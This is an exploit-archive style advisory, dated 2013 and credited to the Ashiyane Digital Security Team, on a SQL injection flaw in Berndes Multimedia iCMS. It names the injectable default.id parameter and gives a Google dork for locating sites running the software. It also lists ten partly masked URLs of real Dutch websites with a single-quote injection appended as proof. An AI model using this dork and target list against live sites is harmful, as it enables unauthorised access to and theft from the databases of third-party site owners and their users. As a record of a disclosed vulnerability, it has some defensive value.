|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [/] Exploit Title: Berndes Multimedia iCMS Sql Injection Vulnerability
|
| [\] Exploit Author: Ashiyane Digital Security Team
|
| [/] Software Link : http://www.berndesmultimedia.nl
|
| [\] Google Dork: intext:"powered by Berndes Multimedia iCMS"
|
| [/] Tested on: Windows,Linux
|
| [\] Date : 2013/09/13
|-------------------------------------------------------------------------|
| [\] Exploit: Sql Injection
| [/] Location : [Target]l/default.id=[Sql Injection]
|-------------------------------------------------------------------------|
| [/] Proof:
|
| [\] http://www.asXi.nl/default.id='
|
| [/] http://www.bX.nl/default.id='
| [\] http://www.batXs.nl/default.id='
|
| [/] http://www.dgtomXransport.nl/default.id='
|
| [\] http://www.fraai-Xten.nl/default.id='
|
| [/] http://www.jongXerend.nl/default.id='
|
| [\] http://www.viXng.nl/default.id='
|
| [/] http://www.senXwijzer.nl/default.id='
|
| [/] http://www.vrXd.nl/default.id='
|
| [\] http://www.Xies.nl/default.id='
|-------------------------------------------------------------------------|
| [/] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|